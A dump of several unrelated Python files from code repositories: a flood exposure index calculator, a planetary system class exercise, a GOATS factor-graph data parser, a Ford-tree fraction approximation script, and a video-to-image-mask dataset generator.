Folder name with exposure tables\r\nOutput_folder_FEI_tables= r'FEI_TABLES'\r\n\r\n# Folder Names for intermediate results\r\nOutput_folder_file_name = \"RESULTS_PAPER_SWIFT\" \r\n\r\n# FOLDER PATHS-----------------------------------------------------------------\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# Inputs\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\n# Path to input files:\r\nInputpath_files= os.path.join(current_working_directory,Input_files_folder_name)\r\n\r\n# Path to input shapes:\r\nInputpath_shapes= 
os.path.join(current_working_directory,Input_shapes_folder_name)\r\n\r\n# Path to input rasters:\r\nInputpath_rasters= os.path.join(current_working_directory,Input_rasters_folder_name)\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# Outputs\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\n# Path to files shapes:\r\nOutPath_files= os.path.join(current_working_directory,Output_files_folder_name)\r\n\r\n# Path to raster results:\r\nOutPath_rasters= os.path.join(current_working_directory,Output_rasters_folder_name)\r\n\r\n# Path to shapefile results:\r\nOutPath_shapes= os.path.join(current_working_directory,Output_shapes_folder_name)\r\n\r\n\r\n\r\n# RESULTS FOLDER -------------------------------------------------------------\r\n\r\n# Path to output shps:\r\nOutPath_FEI_shps= os.path.join(OutPath_shapes,Output_folder_FEI_shps)\r\n\r\n# Path to output files:\r\nOutPath_FEI_files= os.path.join(OutPath_files,Output_folder_FEI_tables)\r\n\r\n\r\n# Results:\r\nOutPath_results_files= os.path.join(OutPath_files,Output_folder_file_name)\r\n\r\nOutPath_results_shps= os.path.join(OutPath_shapes,Output_folder_file_name)\r\n\r\nOutPath_results_rasters= os.path.join(OutPath_rasters,Output_folder_file_name)\r\n\r\n# FILE NAMES-------------------------------------------------------------------\r\n\r\n# Excel file with the list of files to generate FEI\r\nlist_of_input_files= r'00-list-of-files-to-generate-FEI-SWIFT-paper.xls'\r\n\r\n# This is the shapefile with TSFs polygons: \r\nTSFs_polygons_shape= r'TSFs_polygons.shp'\r\n\r\n# This is the shapefile with the polygons' centroids:\r\nTSFs_polygon_centroids_shape = r'TSFs_polygons_centroids.shp'\r\n\r\n# FILE PATHS INPUTS------------------------------------------------------------\r\n\r\n# Here you create a path to the table with the list of rasters\r\ninput_list_file_paths=os.path.join(Inputpath_files,list_of_input_files)\r\n\r\n# Here you create a path to the input shapefiles:\r\n\r\nTSFs_polygons_filepath = os.path.join(Inputpath_shapes,TSFs_polygons_shape)\r\n\r\nTSFs_polygon_centroids_filepath = os.path.join(Inputpath_shapes,TSFs_polygon_centroids_shape)\r\n\r\n###############################################################################\r\n#%% ^ ^ ^ ^ ^ ^ ^ DEFINITION OF FILE LOCATIONS ^ ^ ^ ^ ^ ^ ^ ^ ^\r\n###############################################################################\r\n\r\n###############################################################################\r\n#%% FEI analysis\r\n###############################################################################\r\n\r\n# Here you load the table with the list of rasters\r\n# Warning: MAKE SURE THE FILE LOCATIONS HAVE THE PYTHON NOTATION '\\\\' or '\\' instead of '/' (R)\r\n\r\ndf_file_list=pd.read_excel(input_list_file_paths)\r\n\r\nnumber_of_simulations=len(df_file_list.simulation_ID)\r\n\r\nlist_of_IDs=df_file_list['simulation_ID'].tolist()\r\n\r\n# Here you create the output folders in case they don't exist:\r\n\r\nif not os.path.exists(OutPath_FEI_shps):\r\n os.makedirs(OutPath_FEI_shps)\r\n print(\"Output folder for result shp files didn't exist and was created\")\r\n\r\nif not os.path.exists(OutPath_FEI_files):\r\n os.makedirs(OutPath_FEI_files)\r\n print(\"Output folder result tables didn't exist and was created\")\r\n\r\n# Here you create the output folders in case they don't exist:\r\n\r\nif not os.path.exists(OutPath_results_files):\r\n os.makedirs(OutPath_results_files)\r\n print(\"Output folder for result files didn't exist and was 
created\")\r\n\r\nif not os.path.exists(OutPath_results_shps):\r\n os.makedirs(OutPath_results_shps)\r\n print(\"Output folder result shps didn't exist and was created\")\r\n\r\nif not os.path.exists(OutPath_results_rasters):\r\n os.makedirs(OutPath_results_rasters)\r\n print(\"Output folder result rasters didn't exist and was created\")\r\n\r\n\r\n# In this loop you calculate the FEI value for each simulation \r\n\r\ntime_before_execution = time.time()\r\n\r\n#\r\n###\r\n########\r\n########### Main Loop \r\n\r\nfor x in range(0,number_of_simulations,1):\r\n\r\n print('...................................................')\r\n print(r'Calculating FEI for simulation # '+str(x+1) + r' out of ' + str(number_of_simulations)) \r\n \r\n simulationID=str(df_file_list.simulation_ID[x])\r\n \r\n print(simulationID)\r\n \r\n FPI_filepath=str(df_file_list.folder_path_FPI_files[x])\r\n FPI_filename=str(df_file_list.Name_FPI_files[x])\r\n \r\n FPI_file=os.path.join(FPI_filepath,FPI_filename)\r\n \r\n df_FPI=pd.read_excel(FPI_file)\r\n \r\n HZ_filepath=str(df_file_list.folder_path_hazard_files[x])\r\n HZ_filename=str(df_file_list.Name_hazard_files[x])\r\n \r\n HZ_file=os.path.join(HZ_filepath,HZ_filename)\r\n\r\n df_HAZARD=pd.read_excel(HZ_file)\r\n \r\n col_TSFs_IDs=df_FPI['TSF_id']\r\n col_TSFs_IDs_2=df_HAZARD['TSF_id']\r\n \r\n # This test helps you confirm that the TSF row order is the same in the two arrays\r\n test= np.where(col_TSFs_IDs==col_TSFs_IDs_2, 'all good', 'ERROR')\r\n # print(np.unique(test))\r\n \r\n FPI=df_FPI['FPI']\r\n HAZARD=df_HAZARD['max_Hazard']\r\n \r\n # FEI = FPI x Flood Hazard (per the header); e.g. FPI 0.8 with hazard 0.5 gives FEI 0.4\r\n FEI=FPI*HAZARD\r\n \r\n #--------------------------------------------------------------------------\r\n # Here you create a dataframe to save an excel file with FEI values\r\n \r\n df_FEI_values= pd.DataFrame({'TSF_id': col_TSFs_IDs,\r\n 'FPI':FPI,\r\n 'Flood_Hazard':HAZARD,\r\n 'FEI':FEI})\r\n \r\n \r\n output_name= r'FEI_values_' +simulationID + r'.xlsx'\r\n output_filepath=os.path.join(OutPath_FEI_files,output_name)\r\n writer = ExcelWriter(output_filepath)\r\n df_FEI_values.to_excel(writer,'Sheet1')\r\n writer.save()\r\n \r\n #second copy:\r\n output_filepath=os.path.join(OutPath_results_files,output_name)\r\n writer = ExcelWriter(output_filepath)\r\n df_FEI_values.to_excel(writer,'Sheet1')\r\n writer.save()\r\n \r\n \r\n #--------------------------------------------------------------------------\r\n # Here you create a copy of the Shapefile with TSFs points\r\n \r\n output_name= r'FEI_values_' +simulationID + r'.shp'\r\n output_FEI_shp_path=os.path.join(OutPath_FEI_shps,output_name)\r\n \r\n # Set local variables\r\n in_data = TSFs_polygon_centroids_filepath\r\n out_data = output_FEI_shp_path\r\n\r\n # Execute Copy\r\n arcpy.Copy_management(in_data, out_data)\r\n \r\n # Here you choose the fields to delete from the attribute table\r\n dropFields = [\"OBJECTID\"]\r\n \r\n # Here you execute the field deletion on the attribute table\r\n arcpy.DeleteField_management(output_FEI_shp_path, dropFields)\r\n \r\n #--------------------------------------------------------------------------\r\n # Here you Add a new field with the FPI VALUES\r\n \r\n fieldName1 = \"FPI\"\r\n field_type1= \"FLOAT\"\r\n fieldPrecision1 = 6 # DIGITS INCLUDING DECIMAL POSITIONS\r\n field_scale1=2 # NUMBER OF DECIMAL POSITIONS\r\n fieldAlias1 = \"FPI\"\r\n \r\n arcpy.AddField_management(output_FEI_shp_path,\r\n field_name=fieldName1,\r\n field_type=field_type1,\r\n field_precision=fieldPrecision1,\r\n field_scale=field_scale1,\r\n field_alias=fieldAlias1,\r\n 
field_is_nullable=\"NON_NULLABLE\")\r\n \r\n\r\n # here you populate the field with the list of FPI values\r\n \r\n field_to_modify = ['FPI']\r\n Alloc_index=0\r\n with arcpy.da.UpdateCursor(output_FEI_shp_path, field_to_modify) as cursor:\r\n for row in cursor:\r\n row[0]=FPI[Alloc_index]\r\n Alloc_index=Alloc_index+1\r\n cursor.updateRow(row)\r\n \r\n #-------------------------------------------------------------------------- \r\n # Here you Add a new field with the Hazard value to the shp file\r\n \r\n fieldName2 = \"max_Haz\"\r\n field_type2= \"FLOAT\"\r\n fieldPrecision2 = 6 # DIGITS INCLUDING DECIMAL POSITIONS\r\n field_scale2=3 # NUMBER OF DECIMAL POSITIONS\r\n fieldAlias2 = \"HAZ\"\r\n \r\n arcpy.AddField_management(output_FEI_shp_path,\r\n field_name=fieldName2,\r\n field_type=field_type2,\r\n field_precision=fieldPrecision2,\r\n field_scale=field_scale2,\r\n field_alias=fieldAlias2,\r\n field_is_nullable=\"NON_NULLABLE\")\r\n \r\n\r\n # here you populate the field with the list of Hazard values\r\n \r\n field_to_modify = ['max_Haz']\r\n Alloc_index=0\r\n with arcpy.da.UpdateCursor(output_FEI_shp_path, field_to_modify) as cursor:\r\n for row in cursor:\r\n row[0]=HAZARD[Alloc_index]\r\n Alloc_index=Alloc_index+1\r\n cursor.updateRow(row)\r\n \r\n #--------------------------------------------------------------------------\r\n # Here you Add a new field with the FEI VALUES\r\n \r\n fieldName1 = \"FEI\"\r\n field_type1= \"FLOAT\"\r\n fieldPrecision1 = 6 # DIGITS INCLUDING DECIMAL POSITIONS\r\n field_scale1=2 # NUMBER OF DECIMAL POSITIONS\r\n fieldAlias1 = \"FEI\"\r\n \r\n arcpy.AddField_management(output_FEI_shp_path,\r\n field_name=fieldName1,\r\n field_type=field_type1,\r\n field_precision=fieldPrecision1,\r\n field_scale=field_scale1,\r\n field_alias=fieldAlias1,\r\n field_is_nullable=\"NON_NULLABLE\")\r\n \r\n\r\n # here you populate the field with the list of FPI values\r\n \r\n field_to_modify = ['FEI']\r\n Alloc_index=0\r\n with arcpy.da.UpdateCursor(output_FEI_shp_path, field_to_modify) as cursor:\r\n for row in cursor:\r\n row[0]=FEI[Alloc_index]\r\n Alloc_index=Alloc_index+1\r\n cursor.updateRow(row)\r\n \r\n #--------------------------------------------------------------------------\r\n \r\n #second copy of Shapefile:\r\n output_shp_path=os.path.join(OutPath_results_shps,output_name)\r\n arcpy.Copy_management(output_FEI_shp_path, output_shp_path)\r\n \r\n print('FEI calculated successfully !!')\r\n elapsed_time = (time.time() - time_before_execution) \r\n print('Execution time: ' + str(round(elapsed_time/3600)) + ' hours ' + str(round(elapsed_time/60)%60)+ ' minutes ' + str(round(elapsed_time%60))+' seconds')\r\n\r\n########### Main Loop \r\n########\r\n###\r\n#\r\n\r\n \r\n#%% ","repo_name":"gperez1404/Flood_Hazard_Tools","sub_path":"Generate_Flood_Exposure_Index_for_a_list_of_simulations.py","file_name":"Generate_Flood_Exposure_Index_for_a_list_of_simulations.py","file_ext":"py","file_size_in_byte":14976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16459185234","text":"class System:\n\n # class variable\n systems = []\n\n # class methods\n @classmethod\n def create(cls):\n new_system = System()\n cls.systems.append(new_system)\n return new_system\n\n @classmethod\n def mass_of_all_systems(cls):\n galactic_mass = 0\n for system in cls.systems:\n galactic_mass += system.total_mass()\n return galactic_mass\n\n # instance methods\n def __init__(self):\n # instance variables\n self.bodies = []\n\n def 
__str__(self):\n s = \"\"\n for body in self.bodies:\n i = self.bodies.index(body)\n if i == (len(self.bodies) - 1):\n s += \"* {}\".format(body.name)\n else:\n s += \"* {}\\n\".format(body.name)\n return s\n\n def add(self, body):\n if body in self.bodies:\n print(\"{} has already been added!\".format(body.name))\n else:\n self.bodies.append(body)\n\n def total_mass(self):\n total = 0\n for body in self.bodies:\n total += body.mass\n return total\n\n\nclass Body:\n # class method\n @classmethod\n def all(cls, system):\n bodies_found = []\n for b in system.bodies:\n if isinstance(b, cls):\n bodies_found.append(b)\n return bodies_found\n\n # instance method\n def __init__(self, name, mass):\n self.name = name\n self.mass = mass\n\n def __str__(self):\n return \"* {}\".format(self.name)\n\n\nclass Planet(Body):\n # instance method\n def __init__(self, name, mass, day, year):\n # call parent's (superclass's) init method first\n super().__init__(name, mass)\n self.day = day\n self.year = year\n\n\nclass Star(Body):\n # instance method\n def __init__(self, name, mass, type):\n super().__init__(name, mass)\n self.type = type\n\n\nclass Moon(Body):\n # instance method\n def __init__(self, name, mass, month, planet):\n super().__init__(name, mass)\n self.month = month\n self.planet = planet\n","repo_name":"ant0nm/d15_assignment3_oop","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18716348278","text":"from attrs import field, define\nfrom os.path import expanduser, join\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nimport logging\nfrom py_factor_graph.variables import PoseVariable2D, LandmarkVariable2D\nfrom py_factor_graph.measurements import (\n PoseMeasurement2D,\n FGRangeMeasurement,\n)\nfrom py_factor_graph.utils.matrix_utils import (\n make_transformation_matrix_from_theta,\n make_transformation_matrix_from_rpy,\n get_relative_rot_and_trans_between_poses,\n get_theta_from_rotation_matrix,\n get_measurement_precisions_from_covariances,\n)\nfrom py_factor_graph.factor_graph import (\n FactorGraphData,\n)\n\nimport logging, coloredlogs\n\nlogger = logging.getLogger(__name__)\nfield_styles = {\n \"filename\": {\"color\": \"green\"},\n \"levelname\": {\"bold\": True, \"color\": \"black\"},\n \"name\": {\"color\": \"blue\"},\n}\ncoloredlogs.install(\n level=\"INFO\",\n fmt=\"[%(filename)s:%(lineno)d] %(name)s %(levelname)s - %(message)s\",\n field_styles=field_styles,\n)\n\n\ndef _verify_path_is_goats_csv(instance, attribute, path: Path):\n assert isinstance(path, Path), \"path must be a Path object\"\n if not path.exists():\n raise ValueError(f\"{path} does not exist\")\n if not path.is_file():\n raise ValueError(f\"{path} is not a file\")\n if not path.suffix == \".csv\":\n raise ValueError(f\"{path} is not a .csv file\")\n\n\n@define\nclass GoatsParser:\n\n data_file_path: Path = field(validator=_verify_path_is_goats_csv)\n beacon_loc_file_path: Path = field(validator=_verify_path_is_goats_csv)\n dim: int = field(validator=lambda i, a, v: v in [2, 3]) # type: ignore\n filter_ranges: bool = field()\n\n _data = field(init=False)\n _beacon_locs = field(init=False)\n pyfg = field(init=False)\n\n def __attrs_post_init__(self):\n logger.info(f\"Loading data from {self.data_file_path}\")\n logger.info(f\"Loading beacon locations from {self.beacon_loc_file_path}\")\n\n # read in the sensor 
data\n self._data = pd.read_csv(self.data_file_path)\n\n # Read in the beacon locations as numpy arrays\n _beacon_loc_df = pd.read_csv(self.beacon_loc_file_path, header=None)\n assert isinstance(_beacon_loc_df, pd.DataFrame)\n self._beacon_locs = [\n _beacon_loc_df.iloc[: self.dim, idx].to_numpy()\n for idx in range(len(_beacon_loc_df.columns))\n ]\n\n self._check_beacon_num_consistent()\n\n self.pyfg = FactorGraphData(dimension=self.dim)\n self._fill_factor_graph()\n\n def _check_beacon_num_consistent(self):\n \"\"\"\n Check that the number of beacons in the data matches the number of beacons in the beacon locations file\n \"\"\"\n num_beacon_locs = len(self._beacon_locs)\n data_col_names = self._data.columns\n range_cols = [\n x for x in data_col_names if x.startswith(\"ranges_\") and \"filtered\" not in x\n ]\n filtered_range_cols = [\n x for x in data_col_names if x.startswith(\"filtered_ranges_\")\n ]\n assert len(range_cols) == len(filtered_range_cols) == num_beacon_locs, (\n f\"Number of beacon info is inconsistent. \"\n f\"{len(range_cols)} vs {len(filtered_range_cols)} vs {num_beacon_locs}\"\n )\n\n def _fill_factor_graph(self):\n self._add_beacon_variables()\n self._add_pose_variables()\n self._add_odometry_measurements()\n self._add_range_measurements()\n\n def _remap_beacon_idx(self, idx) -> int:\n logger.warning(\"Beacon indices are being remapped\")\n if idx == 0:\n return 2\n elif idx == 1:\n return 3\n elif idx == 2:\n return 0\n elif idx == 3:\n return 1\n else:\n raise ValueError(f\"Invalid beacon idx {idx}\")\n\n def _add_beacon_variables(self):\n for idx, beacon_loc in enumerate(self._beacon_locs):\n ranges = self._get_ranges(idx)\n\n # if this beacon has no ranges, then we don't add it to the factor\n # graph\n num_non_nan = np.count_nonzero(~np.isnan(ranges))\n if num_non_nan < self.dim:\n logger.warning(\n f\"Beacon {idx} has only {num_non_nan} ranges, so its position \"\n \"is not uniquely defined and it is not added to the factor graph\"\n )\n continue\n\n var_name = f\"L{idx}\"\n var = LandmarkVariable2D(var_name, beacon_loc)\n self.pyfg.add_landmark_variable(var)\n\n def _add_pose_variables(self):\n for idx, pose in enumerate(zip(self.gt_positions, self.gt_rotations)):\n if not self._row_has_range_measures(idx) and idx != 0:\n logger.debug(\n f\"Pose {idx} has no range measurements, so it is not added\"\n )\n continue\n\n position, rot = pose\n var_name = f\"A{idx}\"\n var = PoseVariable2D(var_name, tuple(position), rot)\n self.pyfg.add_pose_variable(var)\n\n def _get_transformation_matrix(self, rot, trans):\n if self.dim == 2:\n assert np.isreal(rot), f\"Rot must be a number {rot}\"\n assert (\n len(trans) == 2\n ), f\"Translation is wrong dimension; should be 2 but is {len(trans)}\"\n return make_transformation_matrix_from_theta(rot, trans)\n elif self.dim == 3:\n assert (\n len(rot) == len(trans) == 3\n ), f\"Dimension mismatch: rpy = {len(rot)} and trans = {len(trans)}\"\n return make_transformation_matrix_from_rpy(rot, trans)\n else:\n raise ValueError()\n\n def _row_has_range_measures(self, row: int) -> bool:\n beacon_ranges = (self._get_ranges(idx) for idx in range(self.num_beacons))\n range_data_at_row = np.array([x[row] for x in beacon_ranges])\n return np.any(~np.isnan(range_data_at_row)).astype(bool)\n\n def _add_odometry_measurements(self):\n start_pos = self.positions[0]\n start_rot = self.rotations[0]\n curr_pose = self._get_transformation_matrix(start_rot, start_pos)\n prev_pose = self._get_transformation_matrix(start_rot, start_pos)\n 
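# Note (illustrative): in the loop below, poses without range measurements\n # are skipped, so each odometry factor composes the relative motion from\n # the last kept pose (prev_pose) to the current one.\n 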
base_pose_name = \"A0\"\n for idx, (position, rot) in enumerate(zip(self.positions, self.rotations)):\n\n if not self._row_has_range_measures(idx):\n continue\n\n curr_pose = self._get_transformation_matrix(rot, position)\n\n # if first pose, then we don't have an odometry measurement\n if idx == 0:\n continue\n\n relative_rot, relative_trans = get_relative_rot_and_trans_between_poses(\n prev_pose, curr_pose\n )\n to_pose_name = f\"A{idx}\"\n x, y = relative_trans\n theta = get_theta_from_rotation_matrix(relative_rot)\n # trans_cov = 0.02 ** 2\n # rot_cov = 0.005 ** 2\n trans_cov = 0.02 ** 2\n rot_cov = 0.002 ** 2\n (\n trans_precision,\n rot_precision,\n ) = get_measurement_precisions_from_covariances(trans_cov, rot_cov)\n # trans_precision = 100.\n # rot_precision = 400.\n relative_pose_measurement = PoseMeasurement2D(\n base_pose=base_pose_name,\n to_pose=to_pose_name,\n x=x,\n y=y,\n theta=theta,\n translation_precision=trans_precision,\n rotation_precision=rot_precision,\n )\n self.pyfg.add_odom_measurement(0, relative_pose_measurement)\n\n base_pose_name = to_pose_name\n prev_pose = curr_pose\n\n def _add_range_measurements(self):\n range_precision = 10.0\n range_stddev = (1.0 / range_precision) ** 0.5\n range_stddev = 0.75\n for beacon_idx in range(self.num_beacons):\n ranges = self._get_ranges(beacon_idx)\n beacon_name = f\"L{beacon_idx}\"\n for pose_idx, dist in enumerate(ranges):\n if np.isnan(dist) or np.isinf(dist) or not np.isreal(dist):\n continue\n\n if dist < 2.0 or dist > 150.0:\n pass\n # logger.info(f\"Range {dist} is out of bounds for beacon {beacon_idx}\")\n # continue\n\n pose_name = f\"A{pose_idx}\"\n association = (pose_name, beacon_name)\n range_measure = FGRangeMeasurement(association, dist, range_stddev)\n self.pyfg.add_range_measurement(range_measure)\n\n @property\n def _COLUMN_NAMES(self):\n return {\n \"x_pos\": \"insXYZ_1\",\n \"y_pos\": \"insXYZ_2\",\n \"z_pos\": \"insXYZ_3\",\n \"x_pos_gt\": \"iNav_GT_1\",\n \"y_pos_gt\": \"iNav_GT_2\",\n \"z_pos_gt\": \"iNav_GT_3\",\n \"roll\": \"insRPY_1\",\n \"pitch\": \"insRPY_2\",\n \"yaw\": \"insRPY_3\",\n \"x_vel\": \"insVel_1\",\n \"y_vel\": \"insVel_2\",\n \"z_vel\": \"insVel_3\",\n \"range_beacon_1\": \"ranges_1\",\n \"range_beacon_2\": \"ranges_2\",\n \"range_beacon_3\": \"ranges_3\",\n \"range_beacon_4\": \"ranges_4\",\n \"range_filtered_1\": \"filtered_ranges_1\",\n \"range_filtered_2\": \"filtered_ranges_2\",\n \"range_filtered_3\": \"filtered_ranges_3\",\n \"range_filtered_4\": \"filtered_ranges_4\",\n }\n\n @property\n def positions(self) -> np.ndarray:\n position_cols = [self._COLUMN_NAMES[x] for x in [\"x_pos\", \"y_pos\", \"z_pos\"]]\n position_cols = position_cols[: self.dim] # drop the last column if we are 2D\n positions = self._data[position_cols].to_numpy()\n return positions\n\n @property\n def gt_positions(self) -> np.ndarray:\n position_cols = [\n self._COLUMN_NAMES[x] for x in [\"x_pos_gt\", \"y_pos_gt\", \"z_pos_gt\"]\n ]\n position_cols = position_cols[: self.dim]\n positions = self._data[position_cols].to_numpy()\n return positions\n\n @property\n def gt_rotations(self) -> np.ndarray:\n logger.warning(\n \"GT rotations are just taken from the corrected\"\n \" INS data so are same as orientations used to derive odometry\"\n )\n return self.rotations\n\n @property\n def poses(self) -> np.ndarray:\n \"\"\"If 2D, return poses as [x,y,theta]. 
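(Clarification: positions come from the corrected INS columns\n insXYZ_*, not the ground-truth iNav_GT_* columns.) 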
If 3D, return poses as\n [x,y,z,roll, pitch, yaw].\n\n Returns:\n np.array: the poses, each row is a different pose\n \"\"\"\n positions = self.positions\n rots = self.rotations\n poses = np.concatenate((positions, rots), axis=1)\n return poses\n\n @property\n def rotations(self) -> np.ndarray:\n if self.dim == 2:\n return self._data[self._COLUMN_NAMES[\"yaw\"]].to_numpy()\n elif self.dim == 3:\n return self._data[\n self._COLUMN_NAMES[\"roll\"],\n self._COLUMN_NAMES[\"pitch\"],\n self._COLUMN_NAMES[\"yaw\"],\n ].to_numpy()\n else:\n raise ValueError(f\"dim was {self.dim} but must be 2 or 3\")\n\n @property\n def velocities(self) -> np.ndarray:\n vel_cols = [self._COLUMN_NAMES[x] for x in [\"x_vel\", \"y_vel\", \"z_vel\"]]\n vel_cols = vel_cols[: self.dim] # drop the last column if we are 2D\n velocities = self._data[vel_cols].to_numpy()\n return velocities\n\n @property\n def num_beacons(self) -> int:\n return len(self._beacon_locs)\n\n def _get_ranges(self, beacon_num) -> np.ndarray:\n if self.filter_ranges:\n return self._get_filtered_range(beacon_num)\n else:\n return self._get_unfiltered_range(beacon_num)\n\n def _get_unfiltered_range(self, beacon_num) -> np.ndarray:\n return self._data[\n self._COLUMN_NAMES[\"range_beacon_{}\".format(beacon_num + 1)]\n ].to_numpy()\n\n def _get_filtered_range(self, beacon_num) -> np.ndarray:\n return self._data[\n self._COLUMN_NAMES[\"range_filtered_{}\".format(beacon_num + 1)]\n ].to_numpy()\n\n\nif __name__ == \"__main__\":\n\n def get_data_and_beacon_files(data_dir: Path):\n files_in_dir = list(data_dir.glob(\"*.csv\"))\n assert len(files_in_dir) == 2, \"There should be two .csv files in the directory\"\n beacon_loc_file = [x for x in files_in_dir if \"beacon\" in x.name.lower()][0]\n\n # the other file is the data file\n data_file = [x for x in files_in_dir if x != beacon_loc_file][0]\n return data_file, beacon_loc_file\n\n goats_dirs = [14, 15, 16]\n for dir_num in goats_dirs:\n data_dir = Path(f\"~/data/goats/goats_{dir_num}\").expanduser()\n data_file, beacon_loc_file = get_data_and_beacon_files(data_dir)\n\n # load the factor graph from the parser\n dimension = 2\n filter_outlier_ranges = True\n parser = GoatsParser(data_file, beacon_loc_file, dimension, filter_outlier_ranges) # type: ignore\n pyfg = parser.pyfg\n\n # save the factor graph as a .pkl file\n pyfg_file_path = str(data_file).replace(\".csv\", \".pkl\")\n pyfg._save_to_pickle_format(pyfg_file_path)\n","repo_name":"hiyyg/PyFactorGraph","sub_path":"py_factor_graph/parsing/parse_goats_data.py","file_name":"parse_goats_data.py","file_ext":"py","file_size_in_byte":13252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71351916890","text":"import sys\nfrom math import sqrt\nfrom fractions import Fraction\n\n# ford tree approximation\n# https://www.bilibili.com/video/av217721014/\n#\n# most interest input, if you forget, is `fordtree.py \"(sqrt(5)-1)/2\"`\n\ndef findpath(target: Fraction):\n print(f'process {target}')\n results = []\n left = Fraction(0, 1)\n right = Fraction(1, 1)\n iteration = 0\n sqrt5 = Fraction(sqrt(5))\n while True:\n iteration += 1\n if iteration == 10000:\n print('max iteration exceed')\n break # prevent infinite loop if logic error\n middle = Fraction(left.numerator + right.numerator, left.denominator + right.denominator)\n difference = abs(target - middle)\n if difference < Fraction(1, middle.denominator * middle.denominator) / sqrt5:\n results.append(middle)\n print(f'[{iteration}] {middle}: diff 
{float(difference)}')\n if middle == target:\n break\n elif middle > target:\n right = middle\n else:\n left = middle\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: ft.py VALUE')\n exit(1)\n findpath(Fraction(eval(sys.argv[1])))\n","repo_name":"FreskyZ/small","sub_path":"ford-tree/fordtree.py","file_name":"fordtree.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9640347456","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 19 13:24:25 2021\n\nCódigo utilizado para gerar as máscaras e as imagens a partir dos videos e marcações XML geradas pelo sensarea.\n\n@author: Gabriel\n\"\"\"\n\nimport cv2 \nimport glob\nimport os\nimport pandas as pd\nimport datetime\nimport shapely\nimport xml.etree.ElementTree as et\nfrom shapely.geometry import Polygon\n#import geopandas as gpd\nfrom shapely.ops import unary_union\nimport numpy as np\nimport cv2\n\n\n\n\ndef get_polygons(path):\n xtree = et.parse(path)\n xroot = xtree.getroot()\n \n masks = xroot.find(\"masks\")\n df = pd.DataFrame(columns=['frame', 'polygon']) \n \n for mask in masks:\n \n dic = {}\n dic['frame'] = int(mask.find('frame').text)\n pontos = mask.find('polygon').attrib.get('points')\n \n tokens = pontos.split(' ')\n poly = []\n for token in tokens[:-1]:\n ponto = token.split(',')\n poly.append((int(ponto[0]), int(ponto[1])))\n \n dic['polygon'] = poly\n df = df.append(dic, ignore_index=True)\n \n return df\n\n\n#fonte: https://www.pyimagesearch.com/2015/09/07/blur-detection-with-opencv/\ndef variance_of_laplacian(image):\n\t# compute the Laplacian of the image and then return the focus\n\t# measure, which is simply the variance of the Laplacian\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n return cv2.Laplacian(image, cv2.CV_64F).var()\n\npath = \"C:\\\\Users\\\\Gabriel\\\\OneDrive - Universidade de Tras-os-Montes e Alto Douro\\\\UTAD\\\\2020-2021\\\\Pesquisa\\\\Dataset\\\\Vídeos\\\\organizado\\\\dividido\"\npath_xml = \"C:\\\\Users\\\\Gabriel\\\\OneDrive - Universidade de Tras-os-Montes e Alto Douro\\\\UTAD\\\\2020-2021\\\\Pesquisa\\\\Dataset\\\\Vídeos\\\\mascaras\"\nos.chdir(path)\n\n#image_quantity=20\n\n\n\n#configuracoes de tamanho: [tamanho da imagem, tamanho do stride, percentual minimo de planta para salvar a imagem]\nconfigs = [[512, int(512/2), 0.80, 0.5], [800, int(800/3), 0.80, 0.5]]\n\n#quantidade de frames que serão \"pulados\"\nnext_frame = 30\n\n#dimensoes para salvar\ndim_salvar = 512\ntam_salvar = (dim_salvar, dim_salvar)\n\ncolumns = ['path', 'class', 'name', 'data_str', 'dia', 'mes', 'ano', 'set']\ndf=pd.DataFrame(columns=columns)\nparser = {'junho':'06',\n 'mai':'05',\n 'agosto':'08',\n 'julho':'07',\n 'set':'09',\n 'maio':'05',\n 'ago':'08'}\n\nfor root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".MTS\"):\n dic = {}\n dic['path'] = os.path.join(root, file)\n dic['name'] = dic['path'].split(os.path.sep)[-1]\n dic['class'] = dic['path'].split(os.path.sep)[-2]\n dic['set'] = dic['path'].split(os.path.sep)[-3]\n df=df.append(dic, ignore_index=True)\n\nprint(df.head())\n\n#verifiva se diritorio existe\npath_to_save = 'C:\\\\Users\\\\Gabriel\\\\Downloads\\\\teste_masks_crop3'\nif not os.path.exists(path_to_save):\n os.mkdir(path_to_save)\n\n\nfor i, row in df.iterrows():\n \n for folder in ['image', 'mask']:\n #verificar se diretorio para salvar imagem existe: diretorio/conjunto/classe\n if not os.path.exists(os.path.join(path_to_save, 
row['set'], folder)):\n #os.mkdir(os.path.join(path_to_save, folder, row['set']))\n os.makedirs(os.path.join(path_to_save, row['set'], folder), exist_ok=True)\n \n #if not os.path.exists(os.path.join(path_to_save, folder, row['set'],row['class'])):\n #os.mkdir(os.path.join(path_to_save, folder, row['set'], row['class']))\n #os.makedirs(os.path.join(path_to_save, folder, row['set'], row['class']), exist_ok=True)\n \n #le video\n cap = cv2.VideoCapture(row['path'])\n \n #captura quantidade de frames do video\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n \n #define path e le arquivo de poligonos\n path_polygon = os.path.join(path_xml, row['class'], row['name'].split('.')[0]+'.xml')\n \n #verifica se o arquivo existe\n df_polygon = None\n if os.path.isfile(path_polygon):\n df_polygon = get_polygons(os.path.join(path_xml, row['class'], row['name'].split('.')[0]+'.xml'))\n n_frame = 0\n continua = True\n print('Video: ', row['path'])\n while(continua):\n #cap.set(cv2.CAP_PROP_POS_FRAMES, (step*i)-1)\n res, frame = cap.read()\n \n if res:\n try:\n #captura altura e largura do frame\n altura_imagem, largura_imagem = frame.shape[:2]\n \n #como o indice e igual ao numero do frame pode-se usar a busca direta no dataframe para se obter o poligono\n #e entao gerar uma representacao com a 